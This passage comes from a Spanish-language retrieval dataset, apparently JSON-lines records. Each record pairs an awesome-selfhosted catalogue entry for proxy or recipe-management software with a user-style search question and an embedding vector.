-0.08535, -0.00426, -0.11911, -0.00938, -0.01432, -0.11885, 0.07178, -0.04696, -0.16775, -0.11292, 0.02561, -0.0336, -0.02434, 0.11723, -0.07587, -0.03759, -0.03503, 0.0998, -0.04938, 0.12464, 0.03158, 0.04541, -0.10026, 0.07329, -0.04517, 0.00299, -0.03484, -0.11949, 0.01869, -0.02841, 0.02017, -0.05842, -0.26279, 0.01935, 0.03967, 0.04581, 0.17861, -0.2011, 0.03082, -0.1002, -0.11193, -0.07116, 0.00075, 0.03873, 0.05599, -0.09234, 0.02113, -0.01555, -0.12592, 0.02001, -0.11452, 0.03996, 0.05447, 0.0149, 0.07947, 0.09067, -0.03231, 0.05313, 0.0495, 0.01, 0.04318, -0.01923, -0.0065, 0.02774, -0.10335, -0.03162, -0.04835, -0.03178, 0.08101, -0.05855, -0.02679, 0.07849, -0.00966, 0.05093, 0.05529, -0.05965, 0.04907, -0.01622, 0.021, -0.04792, 0.03636, -0.00706, -0.06829, 0.1282, 0.10077, 0.07294, 0.04487, -0.05715, -0.02184, -0.02187, 0.08923, 0.08739, -0.00352, -0.03068, -0.02215, 0.02647, 0.00596, 0.01651, 0.00045, -0.06551, 0.0007, -0.04062, -0.0728, -0.00451, -0.06043, -0.00467, -0.00495, 0.05356, 0.01439, -0.00346, -0.0059, -0.05323, -0.03098, 0.02246, -0.02362, 0.03478, 0.06805, -0.07643, 0.00227, -0.02233, 0.01621, -0.00368, -0.07165, -0.08176, 0.02945, 0.02031, -0.00162, -0.10531, -0.0402, 0.01184, 0.05664, -0.06551, -0.06551, -0.01831, -0.07974, -0.03038, -0.00133, -0.0447, -0.11017, 0.09787, 0.01644, -0.01248, 0.03609, 0.04223, -0.01846, -0.00103, -0.08109, 0.01585, 0.08622, 0.01433, 0.01553, 0.05436, 0.01467, -0.07946, 0.00985, -0.06525, -0.03397, -0.02782, 0.02496, -0.04051, 0.01193, -0.09132, -0.01541, 0.04925, -0.01007, -0.07168, 0.0666, -0.04491, 0.02842, 0.04803, -0.02334, 0.00679, -0.04998, -0.00675, 0.01028, -0.00919, 0.00564, -0.07566, 0.04403, -0.03255, -0.07772, -0.01754, 0.03632, -0.06467, 0.02202, 0.01535, -0.03759, -0.04654, -0.01058, 0.03813, 0.05178, -0.0626, 0.01874, -0.02136, 0.01753, 0.02852, 0.05908, 0.01128, -0.04419, 0.00985, 0.01562, -0.02771, -0.00099, 0.004, 0.0025, 0.02745, 0.03498, -0.01886, -0.00118, -0.01779, -0.00891, -0.01415, -0.06355, -0.00631, 0.06915, -0.03775, -0.00114, 0.02591, -0.03106, -0.02576, 0.00013, 0.02583, -0.00872, -0.00527, -0.03965, -0.03977, -0.02486, -0.02377, -0.01817, -0.03547, -0.04266, -0.00804, 0.02417, -0.02053, 0.0024, 0.00861]} -{"tipo": "pregunta", "herramienta": "Proxy", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Proxy", "tema": "proxy", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Proxy: sish β€” HTTP(S)/WS(S)/TCP tunnels to localhost using only SSH (serveo/ngrok alternative) [MIT, Go/Docker]. socks5-proxy-server β€” SOCKS5 proxy server with built-in authentication and Telegram-bot for user management and user statistics on data spent (handy when you pay per GB of data). It is dockerised and simple to install [Apache-2.0, Docker]. Squid β€” Caching proxy for the Web supporting HTTP, HTTPS, FTP, and more. It reduces bandwidth and improves response times by caching and reusing frequently-requested web pages [GPL-2.0, C/deb]. Tinyproxy β€” Light-weight HTTP/HTTPS proxy daemon [GPL-2.0, C/deb].", "indexar": "cuΓ‘l es una alternativa libre a serveo o ngrok?", "v": [-0.02463, 0.02231, -0.08395, 0.12823, -0.012, -0.03775, 0.01522, -0.12197, -0.0497, -0.10051, -0.12746, -0.28706, 0.0893, 0.01068, 0.17907, -0.00701, 0.04602, -0.00191, 0.03585, 0.06267, -0.10909, -0.05218, -0.03105, 0.00876, -0.04804, -0.11402, 0.03322, -0.0302, -0.076, 0.04884, 0.0209, -0.06107, 0.05646, -0.0427, 0.04713, 0.00369, 0.21542, 0.07714, 0.10628, -0.02577, -0.02887, -0.12508, -0.02127, 0.09947, -0.02983, -0.0126, -0.03427, 0.08011, 0.01525, 0.13022, 0.02117, -0.06424, 0.02106, 0.07072, 0.07269, 0.0032, 0.02572, -0.0675, -0.03443, -0.04211, -0.11718, 0.00747, 0.11755, -0.08388, 0.10029, -0.01505, -0.10748, 0.05129, 0.05588, 0.01504, 0.05009, -0.06517, 0.09515, -0.02558, -0.1677, 0.04861, -0.07489, -0.05432, -0.05469, 0.0377, 0.08605, -0.05535, -0.04825, 0.06611, 0.01783, -0.05186, 0.12578, -0.09227, 0.0308, 0.0366, 0.12621, 0.07261, 0.0191, 0.12117, -0.04109, -0.02575, -0.02514, 0.05714, -0.02636, 0.04409, 0.09777, 0.02204, -0.11598, -0.04643, 0.00294, -0.04549, 0.00525, -0.04466, -0.16638, 0.00209, -0.01264, 0.02951, 0.01276, 0.04665, 0.02859, -0.06916, -0.03078, 0.04159, 0.01347, 0.02352, -0.02249, 0.04937, 4e-05, -0.10461, 0.0325, 0.06532, 0.06166, 0.05474, -0.01305, 0.06761, 0.0279, -0.01401, -0.09677, -0.08831, -0.13755, -0.08042, 0.12413, -0.04107, 0.04772, 0.00953, 0.00176, 0.01672, -0.02082, 0.02001, 0.02365, -0.02245, 0.03231, -0.03812, -0.00325, -0.07806, -0.101, 0.0112, 0.01029, 0.10943, -0.05518, -0.04652, -0.04543, -0.00424, -0.07514, 0.09941, 0.05433, -0.05675, 0.01118, 0.00307, 0.00892, -0.02879, 0.00069, -0.04381, -0.06684, 0.00418, -0.04025, 0.0567, 0.07665, -0.06674, 0.0364, -0.06429, -0.02125, -0.06388, 0.01053, 0.00276, 0.03363, 0.02447, -0.14046, 0.03031, 0.00758, -0.06925, 0.01666, 0.0069, 0.00029, 0.05191, -0.05426, -0.01054, -0.03777, -0.05664, -0.03428, 0.0234, 0.01115, -0.08472, -0.03127, 0.04819, -0.08379, -0.03099, -0.04996, 0.00536, -0.02498, 0.00126, -0.00676, 0.06413, 0.0358, 0.05776, 0.03484, -0.0223, 0.08981, 0.02319, -0.03429, 0.02051, -0.00634, -0.00112, 0.0316, -0.02791, 0.03805, 0.00601, -0.0103, 0.00848, 0.00438, 0.05688, 0.01343, 0.05131, -0.04548, -0.00359, 0.03467, 0.01777, 0.03152, 0.04373, -0.00916, -0.0198, -0.01443, 0.03091, 0.03346, -0.05765, 0.05261, 0.05917, -0.04146, 0.02222, -0.0355, 0.03939, -0.08024, -0.01871, -0.07273, -0.02997, -0.01479, 0.0516, 0.02041, 0.02373, 0.01104, 0.04131]} -{"tipo": "pregunta", "herramienta": "Proxy", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Proxy", "tema": "proxy", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Proxy: sish β€” HTTP(S)/WS(S)/TCP tunnels to localhost using only SSH (serveo/ngrok alternative) [MIT, Go/Docker]. socks5-proxy-server β€” SOCKS5 proxy server with built-in authentication and Telegram-bot for user management and user statistics on data spent (handy when you pay per GB of data). It is dockerised and simple to install [Apache-2.0, Docker]. Squid β€” Caching proxy for the Web supporting HTTP, HTTPS, FTP, and more. It reduces bandwidth and improves response times by caching and reusing frequently-requested web pages [GPL-2.0, C/deb]. Tinyproxy β€” Light-weight HTTP/HTTPS proxy daemon [GPL-2.0, C/deb].", "indexar": "con quΓ© puedo montar un servidor proxy SOCKS5 con gestiΓ³n de usuarios?", "v": [-0.06484, 0.01995, -0.19952, -0.10964, -0.13097, -0.15909, 0.02236, -0.07454, 0.00076, -0.03299, -0.1098, 0.02322, 0.14229, -0.18896, 0.00871, 0.02806, 0.14491, -0.10208, 0.01183, 0.15086, 0.00477, 0.02255, 0.03522, -0.07408, 0.03525, 0.10074, 0.08281, -0.09405, -0.04827, -0.07188, 0.00067, -0.00531, -0.00101, 0.07264, 0.01764, -0.05771, -0.03867, 0.15721, 0.09354, 0.10364, 0.02763, -0.09726, -0.08429, 0.02455, 0.09432, -0.04985, 0.0391, -0.17079, 0.07189, -0.01217, -0.08016, -0.1386, -0.17338, 0.06144, -0.07052, -0.00324, 0.06928, -0.13687, 0.09571, -0.03454, -0.11227, 0.09017, 0.00798, 0.00858, 0.08887, -0.04278, 0.00354, -0.00059, -0.07626, 0.02169, -0.06378, -0.01923, -0.00602, -0.0772, 0.07131, 0.07512, 0.05225, -0.03613, 0.04774, 0.0611, 0.03847, 0.02359, -0.05912, 0.07777, -0.11604, -0.04308, -0.07177, -0.05453, 0.09695, -0.0149, 0.06382, 0.04772, 0.00446, -0.05275, 0.00694, -0.07946, 0.15147, -0.057, -0.01462, -0.04377, 0.03478, 0.08528, -0.02256, 0.13957, 0.00221, 0.09446, 0.04677, -0.14397, 0.05353, -0.01807, 0.05811, -0.04047, -0.03327, -0.03742, 0.0078, -0.07457, -0.01892, 0.05238, 0.0341, 0.02866, -0.04894, -0.0062, 0.06218, -0.03116, 0.11392, -0.01773, 0.06983, 0.0779, -0.01401, -0.02721, -0.01564, -0.0942, -0.07221, -0.03614, -0.05259, 0.01243, 0.03014, -0.06695, -0.07264, -0.04917, -0.03723, -0.0309, -0.04313, 0.04115, 0.06367, -0.01172, 0.07084, -0.02659, -0.02512, -0.022, 0.06709, 0.00716, -0.06638, -0.01527, -0.09914, 0.00419, 0.00575, -0.08584, -0.04607, 0.03434, 0.03351, 0.02273, 0.02083, 0.09287, -0.00728, -0.00044, 0.00723, 0.06025, 0.0418, 0.06981, 0.00362, 0.02852, -0.02035, -0.06087, 0.03674, -0.01749, -0.04916, -0.07892, -0.00955, 0.0187, 0.00405, -0.03504, -0.00136, 0.05641, -0.03842, -0.08104, -0.01558, -0.04712, 0.01102, 0.03048, -0.01475, 0.07371, 0.00297, 0.03801, 0.08423, -0.06272, -0.00085, -0.0239, -0.03867, -0.02802, -0.01807, -0.03842, -0.00682, -0.02348, -0.01887, -0.04489, -0.01366, 0.03792, 0.07384, 0.05035, 0.02192, -0.04585, 0.05428, -0.00258, -0.04624, 0.00812, 0.05144, -0.07211, -0.05233, -0.03378, -0.08887, 0.04233, 0.04854, -0.01372, 0.06813, 0.04897, -0.03626, -0.01284, 0.06943, 0.00494, -0.03262, 0.00788, -0.03368, -0.00341, 0.00471, 0.01716, 0.04236, -0.03293, -0.00131, 0.00309, -0.01822, 0.08178, 0.00366, -0.06802, -0.00803, -0.03112, 0.0002, -0.01283, -0.04568, -0.01208, -0.02502, -0.02165, -0.01854, -0.07068, -0.0258, -0.0125]} -{"tipo": "pregunta", "herramienta": "Recipe Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Recipe Management", "tema": "recipe management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Recipe Management: Bar Assistant β€” Manage your home bar while adding your ingredients, searching for cocktails and creating custom cocktail recipes [MIT, PHP/Docker]. CookCLI β€” Command-line tool for automating meal planning and shopping with Cooklang recipes, scriptable for UNIX workflows, includes web server [MIT, Rust]. Fork Recipes β€” Manage your food recipes with simplicity [BSD-3-Clause, Docker]. ManageMeals β€” Manage recipes, import recipes by URL and organize them without any ads or unnecessary text [GPL-3.0, Docker]. Mealie β€” Material design inspired recipe manager with category and tag management, shopping-lists, meal-planner, and site customizations. Mealie is focused on simple user interactions to keep the whole family using the app [MIT, Python]. RecipeSage β€” A recipe keeper, meal plan organizer, and shopping list manager that can import recipes directly from any URL [AGPL-3.0, Nodejs]. Recipya β€” Clean, simple and powerful recipe manager your whole family will enjoy [GPL-3.0, Docker/Go].", "indexar": "que programa puedo usar para gestionar mis recetas de cocina en casa", "v": [0.01026, 0.03594, -0.05213, -0.21799, 0.01255, -0.06887, -0.03715, 0.03209, -0.11705, -0.13247, -0.08004, -0.08365, 0.00332, -0.04194, -0.02542, -0.00751, 0.17856, -0.01317, 0.05103, 0.03329, -0.05199, 0.00473, -0.02957, 0.01349, -0.10369, 0.01233, 0.17866, -0.06687, -0.0713, 0.04174, -0.04475, 0.00266, 0.03994, -0.09071, -0.04983, 0.05312, -0.01031, -0.08397, 0.03587, 0.00824, 0.01547, 0.07466, -0.0418, 0.0094, 0.0537, -0.00875, 0.16997, -0.11105, -0.05981, 0.01292, -0.10458, -0.12614, 0.03782, 0.07992, 0.03198, -0.00492, -0.01077, -0.18031, 0.00634, 0.08497, 0.02176, -0.08397, 0.06172, 0.11981, -0.00089, -0.04239, -0.00888, 0.02563, 0.02627, 0.04837, -0.07662, 0.15183, 0.00979, -0.05893, -0.07194, -0.03642, 0.0076, 0.0069, 0.03439, -0.09513, -0.0583, -0.05018, -0.02327, 0.04201, -0.04382, -0.08222, 0.08438, -0.13997, -0.01562, -0.08871, -0.01564, -0.07265, -0.00502, -0.01532, 0.12499, -0.02296, 0.15146, 0.05652, -0.01322, 0.08382, 0.06948, -0.07251, -0.07178, 0.19368, -0.04781, 0.07129, 0.10508, -0.03574, -0.06062, -0.04072, -0.10457, 0.01787, -0.07471, -0.03029, -0.04771, 0.06589, -0.06738, -0.04519, 0.00049, -0.0676, -0.13179, -0.00138, -0.0044, 0.08115, 0.10372, -0.04063, 0.06566, 0.07657, -0.05042, 0.09015, -0.08801, -0.01559, 0.04768, -0.00797, 0.04565, -0.01361, -0.02326, -0.02221, -0.04135, -0.12424, -0.05924, 0.08692, 0.00341, -0.08444, 0.02249, -0.01828, -0.04988, -0.042, -0.008, 0.00906, -0.03981, -0.00578, -0.03434, 0.0255, -0.02094, 0.00677, 0.0004, -0.0203, -0.1315, -0.00591, -0.09247, 0.01743, -0.11219, -0.03396, 0.00357, -0.00413, 0.06628, 0.07082, 0.02411, 0.04383, -0.01216, 0.09176, 0.0183, 0.01125, 0.02074, -0.07464, 0.00413, -0.09727, -0.07968, 0.02487, -0.05661, 0.03942, 0.00517, 0.0148, 0.03228, 0.06712, -0.00433, 0.10426, -0.02713, -0.00139, -0.12734, -0.00799, -0.01514, 0.02398, -0.01251, 0.03323, -0.01272, 0.02182, 0.03956, -0.03588, -0.04124, -0.01258, 0.06143, 0.05451, 0.01593, 0.08462, -0.03474, 0.01279, 0.05208, 0.05864, 0.02136, -0.03908, 0.05876, 0.04892, -0.04054, 0.02097, -0.04072, 0.03032, 0.08102, 0.02352, 0.03256, 0.00547, -0.05937, 0.00767, 0.05333, -0.02176, 0.00302, -0.07245, 0.00669, 0.0124, -0.01611, -0.06775, 0.02995, 0.02871, 0.00758, -0.06352, 0.00117, -0.07246, -0.02308, -0.0008, -0.08275, 0.09026, 0.06027, 0.0161, 0.00316, 0.00937, -0.05121, 0.01491, 0.02028, 0.03924, -0.00637, -0.0052, 0.0178, 0.00297, 0.0219, 0.04159]} -{"tipo": "pregunta", "herramienta": "Recipe Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Recipe Management", "tema": "recipe management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Recipe Management: Bar Assistant β€” Manage your home bar while adding your ingredients, searching for cocktails and creating custom cocktail recipes [MIT, PHP/Docker]. CookCLI β€” Command-line tool for automating meal planning and shopping with Cooklang recipes, scriptable for UNIX workflows, includes web server [MIT, Rust]. Fork Recipes β€” Manage your food recipes with simplicity [BSD-3-Clause, Docker]. ManageMeals β€” Manage recipes, import recipes by URL and organize them without any ads or unnecessary text [GPL-3.0, Docker]. Mealie β€” Material design inspired recipe manager with category and tag management, shopping-lists, meal-planner, and site customizations. Mealie is focused on simple user interactions to keep the whole family using the app [MIT, Python]. RecipeSage β€” A recipe keeper, meal plan organizer, and shopping list manager that can import recipes directly from any URL [AGPL-3.0, Nodejs]. Recipya β€” Clean, simple and powerful recipe manager your whole family will enjoy [GPL-3.0, Docker/Go].", "indexar": "cual es una alternativa libre a los gestores de recetas que usan la nube", "v": [0.09264, -0.09003, -0.02441, -0.04939, -0.01285, 0.06993, -0.09317, -0.11894, -0.19905, -0.12282, -0.10369, -0.15068, -0.05799, 0.07509, -0.00867, -0.01781, 0.06263, -0.02822, 0.1448, 0.05177, -0.026, -0.00643, -0.02588, -0.03622, -0.16349, -0.11507, 0.14138, -0.01291, 0.00722, -0.00081, -0.06558, -0.07274, 0.00547, -0.10549, -0.00752, 0.07162, 0.02197, 0.01288, -0.04751, -0.02734, 0.00286, -0.02431, -0.1335, 0.10538, 0.00719, -0.11487, -0.02416, -0.05897, 0.02705, 0.08696, -0.109, -0.01374, 0.00205, 0.0832, -0.01346, 0.03781, 0.09449, -0.05232, -0.10405, -0.01129, -0.11958, 0.00839, 0.07372, -0.06685, -0.00054, 0.01339, -0.00999, 0.03252, -0.12535, 0.051, 0.08121, 0.07815, -0.00013, -0.00325, -0.08397, 0.1326, 0.03056, 0.00662, -0.08299, 0.02178, 0.06529, 0.01609, -0.032, 0.0731, -0.04839, -0.03757, 0.0993, -0.17774, -0.0289, 0.03599, -0.02675, -0.0595, 0.05588, 0.11308, 0.01513, 0.01095, 0.06117, 0.16932, -0.08282, 0.17722, 0.07508, 0.13306, -0.0841, 0.059, -0.01942, 0.08964, 0.10023, 0.0246, -0.00779, 0.04293, -0.02763, 0.0415, 0.04412, 0.05847, 0.04501, -0.03485, 0.01597, -0.02925, -0.07397, 0.00566, -0.02871, -0.05039, -0.03143, -0.05791, 0.06616, 0.06304, 0.03658, 0.07263, -0.08174, 0.02646, -0.04956, 0.00961, 0.00388, 0.0278, -0.0865, 0.03142, -0.01828, -0.08336, 0.03445, -0.02689, -0.0621, -0.01352, 0.04489, 0.00024, 0.04509, -0.08507, 0.04037, -0.04205, 0.00793, -0.04942, -0.07866, 0.00583, -0.08042, 0.11239, -0.07195, 0.06381, -0.05829, -0.02113, -0.15716, 0.07454, 0.12533, 0.00294, -0.05711, 0.03458, -0.01017, -0.05272, -0.02046, 0.01248, -0.03359, 0.07797, -0.00874, 0.02167, 0.04349, -0.06502, 0.05912, -0.00956, -0.0157, -0.13751, 0.03861, 0.01538, 0.04579, -0.03938, -0.04691, 0.07111, -0.01448, -0.05186, -0.02076, 0.07111, -0.00817, 0.09698, -0.00972, -0.01401, -0.11061, -0.06675, 0.0441, -0.00275, -0.01128, -0.05364, -0.04855, 0.00699, -0.04363, -0.01483, -0.05567, -0.03548, -0.03903, 0.0148, -0.05443, 0.07081, 0.03575, 0.03507, 0.03403, 0.01066, -0.00385, 0.01128, 0.0338, -0.00168, -0.03076, -0.02921, 0.02485, -0.05683, 0.02409, -0.01206, 0.03041, -0.02072, -0.00058, 0.05271, -0.0272, 0.05927, -0.04359, 0.00238, -0.03303, -0.04918, 0.01381, 0.01667, -0.01199, 0.01668, 0.03516, 0.01812, 0.0083, -0.03447, -0.02527, 0.07557, -0.00625, 0.00214, -0.06386, -0.01723, -0.08923, -0.03362, -0.03343, -0.00212, -0.0145, 0.02955, 0.02166, -0.00391, 0.018, -0.00195]} -{"tipo": "pregunta", "herramienta": "Recipe Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Recipe Management", "tema": "recipe management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Recipe Management: Bar Assistant β€” Manage your home bar while adding your ingredients, searching for cocktails and creating custom cocktail recipes [MIT, PHP/Docker]. CookCLI β€” Command-line tool for automating meal planning and shopping with Cooklang recipes, scriptable for UNIX workflows, includes web server [MIT, Rust]. Fork Recipes β€” Manage your food recipes with simplicity [BSD-3-Clause, Docker]. ManageMeals β€” Manage recipes, import recipes by URL and organize them without any ads or unnecessary text [GPL-3.0, Docker]. Mealie β€” Material design inspired recipe manager with category and tag management, shopping-lists, meal-planner, and site customizations. Mealie is focused on simple user interactions to keep the whole family using the app [MIT, Python]. RecipeSage β€” A recipe keeper, meal plan organizer, and shopping list manager that can import recipes directly from any URL [AGPL-3.0, Nodejs]. Recipya β€” Clean, simple and powerful recipe manager your whole family will enjoy [GPL-3.0, Docker/Go].", "indexar": "con que herramienta puedo organizar las compras y planificar comidas del hogar", "v": [0.15753, 0.10558, -0.09667, -0.15039, 0.04377, -0.04792, 0.01194, 0.06402, -0.22697, -0.17266, -0.10155, 0.0219, 0.03764, -0.09966, 0.03752, 0.03454, 0.16675, 0.00155, -0.00928, 0.04361, -0.0322, 0.07119, -0.1336, 0.08029, -0.11672, -0.1077, 0.20095, 0.07177, -0.2517, 0.1418, -0.0174, 0.02988, 0.05716, -0.08891, -0.08724, -0.00696, -0.04289, 0.06109, -0.09539, -0.11203, -0.05419, 0.10277, -0.01035, 0.00549, 0.0135, 0.02613, -0.03099, -0.01415, -0.06486, 0.04207, -0.02344, -0.06576, -0.02206, 0.04935, 0.0206, -0.0448, 0.04289, -0.09495, 0.06535, -0.02939, -0.04657, 0.01055, 0.1175, 0.11404, 0.05069, 0.10079, -0.09299, 0.03519, 0.00973, -0.02462, -0.09013, 0.03135, 0.00648, -0.0029, -0.01126, 0.00753, 0.13687, 0.0927, 0.06224, 0.01604, 0.05357, -0.09966, -0.04777, 0.06299, -0.01389, -0.1303, -0.03654, -0.0363, 0.01758, -0.03933, -0.01091, -0.01473, 0.04453, 0.00865, 0.01557, -0.01999, 0.11718, 0.02481, 0.00935, 0.08394, 0.07592, -0.11353, -0.11084, 0.07759, -0.07374, 0.04667, 0.0125, 0.06328, -0.02299, -0.08019, -0.05803, 0.01666, -0.01967, -0.03012, 0.02576, 0.00228, -0.10658, -0.03656, 0.01946, -0.03736, 0.01195, 0.11654, -0.00213, 0.0575, -0.02018, -0.01816, 0.05338, 0.08442, 0.02778, -0.04321, 0.03778, 0.04442, 0.033, 0.02931, -0.04243, -0.07327, -0.04725, -0.10134, 0.01257, -0.03297, -0.04651, 0.00031, -0.04806, -0.0659, 0.05026, 0.04139, 0.00493, -0.01013, -0.08016, 0.05644, -0.00685, 0.02841, 0.05047, 0.0106, 0.01683, 0.04339, -0.10933, -0.06616, -0.00926, 0.0525, -0.08115, 0.03205, 0.02016, -0.01577, -0.00703, -0.07383, 0.0791, 0.0346, 0.04486, 0.0844, 0.00667, 0.02714, -0.00126, -0.02026, -0.01341, -0.10201, -0.00861, -0.02531, -0.02181, -0.02324, -0.05696, 0.06227, -0.07138, -0.02187, -0.0097, -0.01108, -0.00132, 0.01859, 0.00959, -0.03038, -0.02099, 0.02795, 0.01908, -0.04114, -0.01802, 0.00987, -0.08563, -0.01206, 0.06328, -0.01915, -0.03106, -0.04131, 0.07093, -0.03814, 0.03133, 0.04834, -0.04864, 0.03204, -0.01481, 0.07142, 0.03936, -0.07019, 0.05684, -0.07263, -0.05866, 0.02003, -0.01888, -0.04679, -0.00535, 0.0531, 0.00621, 0.0922, 0.01595, -0.04235, 0.05786, -0.01488, 0.02139, 0.00873, 0.01131, 0.04614, 0.03684, -0.0524, 0.02567, -0.00621, 0.01317, -0.03833, 0.04016, -0.04012, -0.05084, 0.01555, -0.00921, 0.02854, -0.01044, -0.03218, -0.03135, -0.05605, -0.00551, 0.02334, -0.01652, -0.06014, 0.03453, 0.03903, 0.07103, -0.03922, 0.00266, -0.03232]} -{"tipo": "pregunta", "herramienta": "Recipe Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Recipe Management", "tema": "recipe management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Recipe Management: Tamari β€” Recipe manager web app with a built-in collection of recipes. Organize by favorites and categories, create shopping lists, and plan meals [GPL-3.0, Docker/Python]. Vanilla Cookbook β€” Recipe manager designed with complexity under the hood, keeping the user experience as uncluttered, simply vanilla as possible [GPL-3.0, Docker/Nodejs]. What To Cook? β€” Get a recipe to cook today, based on the ingredients you have at home [AGPL-3.0, Docker].", "indexar": "que programa sirve para organizar recetas y crear listas de compras?", "v": [0.11602, 0.08904, -0.10869, -0.22791, 0.07134, -0.22785, 0.07632, 0.01922, -0.14927, -0.20378, -0.09218, -0.11256, 0.05594, -0.15936, 0.05791, 0.00337, 0.12086, -0.08632, 0.11416, 0.07595, -0.01834, 0.06073, -0.05944, 0.00441, -0.14112, -0.09899, 0.14429, -0.05803, -0.11272, 0.12021, -0.01332, -0.00767, 0.00387, -0.1428, 0.02032, 0.00037, 0.05889, -0.05436, -0.11318, 0.03303, -0.04894, 0.09034, -0.05236, 0.06229, -0.03761, 0.02102, 0.1197, 0.05709, 0.00272, 0.02633, 0.04577, 0.03145, -0.0256, 0.04508, 0.0689, -0.07582, -0.1451, -0.15817, -0.07387, 0.00741, -0.0788, -0.0758, 0.06557, 0.00903, 0.03078, 0.06232, -0.0667, 0.01557, 0.01788, -0.01035, -0.12517, 0.01028, 0.02399, -0.05802, -0.0105, 0.02097, 0.02613, 0.00379, -0.04121, 0.01347, 0.00508, -0.04196, -0.02064, 0.03851, -0.00995, -0.0768, 0.01846, 0.02488, -0.0047, -0.05369, -0.01104, 0.02793, 0.00027, 0.02035, 0.10431, -0.02257, 0.16022, 0.04184, 0.06397, 0.14946, -0.01873, -0.11258, -0.05642, 0.09767, -0.11308, 0.07559, 0.09051, 0.08513, -0.02139, -0.00137, -0.03938, 0.00164, -0.02964, 0.00255, -0.01619, -0.04235, -0.00182, 0.03883, 0.03407, 0.02707, -0.04792, 0.10002, -0.08688, 0.015, 0.04578, 0.03653, 0.04413, 0.12983, -0.0334, 0.05212, 0.03796, 0.04904, -0.02595, -0.00022, -0.06747, -0.11814, -0.02075, -0.01964, 0.0075, -0.05375, -0.02093, 0.05836, -0.04524, -0.05127, -0.00984, -0.01774, 0.06089, -0.02734, 0.00566, 0.06695, 0.03075, -1e-05, 0.00189, 0.04207, -0.01129, -0.00862, -0.02575, -0.0789, -0.02926, 0.01422, -0.05538, 0.08493, -0.03678, -0.05558, 0.05444, -0.09414, 0.02618, 0.06088, 0.04345, 0.07266, 0.01169, 0.07306, 0.03687, -0.09485, -0.03182, -0.02423, 0.00155, -0.06507, 0.0204, 0.04283, -0.04679, 0.01916, 0.0245, 0.02866, 0.00419, -0.06158, 0.0193, 0.03281, -0.00491, 0.00301, -0.06608, -0.02368, -0.0334, -0.00118, 0.0279, -0.00184, -0.00818, -0.00358, 0.01623, -0.06706, -0.03089, -0.05672, 0.01477, -0.00968, 0.00019, 0.04734, -0.08728, 0.02637, 0.06036, 0.09457, 0.03604, -0.04333, 0.00054, -0.00193, -0.05599, -0.0398, -0.05198, -0.02746, 0.06642, 0.00432, 0.00372, -0.01162, -0.04824, 0.02492, 0.02262, -0.02768, 0.02975, 0.00102, 0.04501, 0.04561, -0.02051, -0.05045, 0.04098, -0.02508, -0.01953, -0.05875, -0.00696, -0.00956, 0.00447, -0.01288, -0.02608, 0.04721, -0.01451, -0.05734, -0.01951, 0.0023, 0.00981, 0.00889, -0.03639, -0.03641, -0.03561, 0.00737, 0.04528, -0.02077, 0.03344, 0.00649]} -{"tipo": "pregunta", "herramienta": "Recipe Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Recipe Management", "tema": "recipe management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Recipe Management: Tamari β€” Recipe manager web app with a built-in collection of recipes. Organize by favorites and categories, create shopping lists, and plan meals [GPL-3.0, Docker/Python]. Vanilla Cookbook β€” Recipe manager designed with complexity under the hood, keeping the user experience as uncluttered, simply vanilla as possible [GPL-3.0, Docker/Nodejs]. What To Cook? β€” Get a recipe to cook today, based on the ingredients you have at home [AGPL-3.0, Docker].", "indexar": "hay alguna alternativa libre para gestionar recetas que se pueda ejecutar con docker?", "v": [0.10414, 0.02359, -0.14007, -0.08096, -0.0163, -0.09541, 0.11014, 0.09957, -0.10037, -0.15201, -0.10316, -0.16316, -0.01352, -0.1612, 0.08463, -0.03326, 0.16926, -0.02549, 0.07831, 0.00255, -0.04092, 0.10653, -0.03082, -0.07685, -0.02449, -0.09945, -0.008, -0.03546, -0.12789, -0.04169, -0.02814, -0.01848, 0.01806, -0.06085, -0.03383, 0.06783, 0.04708, -0.00701, 0.08564, 0.00377, -0.02881, 0.07666, -0.12856, 0.08119, -0.03621, 0.03986, 0.01036, -0.1093, 0.07113, -0.01181, -0.05146, -0.03672, -0.04675, 0.04433, -0.00822, 0.09379, 0.09432, -0.16683, 0.00081, -0.06541, -0.09052, 0.03212, 0.02183, -0.0533, 0.04619, 0.02135, 0.00266, 0.03347, -0.02743, 0.19665, -0.03412, 0.14913, 0.07262, 0.03838, -0.04286, -0.03818, 0.04174, 0.07184, -0.02102, 0.07273, -0.01255, -0.07656, -0.07696, 0.0975, 0.03106, -0.11126, 0.0345, -0.12306, 0.06111, -0.01643, 0.0719, -0.06805, -0.05132, 0.05388, 0.05773, -0.04035, 0.02255, 0.06754, -0.06755, 0.04439, 0.01881, 0.05102, -0.05917, 0.05835, 0.01117, 0.06957, 0.03015, -0.01124, -0.01054, -0.00893, -0.07269, 0.05852, 0.04437, -0.03965, -0.05338, 0.01934, -0.06798, 0.07071, 0.02462, 0.02711, 0.00556, -0.087, -0.07289, -0.04733, 0.06054, -0.03178, 0.06803, 0.08351, -0.04258, 0.00695, -0.01296, -0.09272, -0.05178, -0.085, -0.07397, 0.0956, 0.06699, -0.0998, -0.04475, -0.1461, -0.12515, 0.00854, 0.03623, -0.03149, 0.02246, 0.01107, 0.00922, -0.08948, 0.0353, -0.00104, 0.06536, 0.0046, -0.03545, 0.08879, -0.10044, 0.01847, -0.04837, -0.01504, -0.05385, 0.12527, 0.03459, -0.0198, -0.11798, -0.00171, -0.00305, 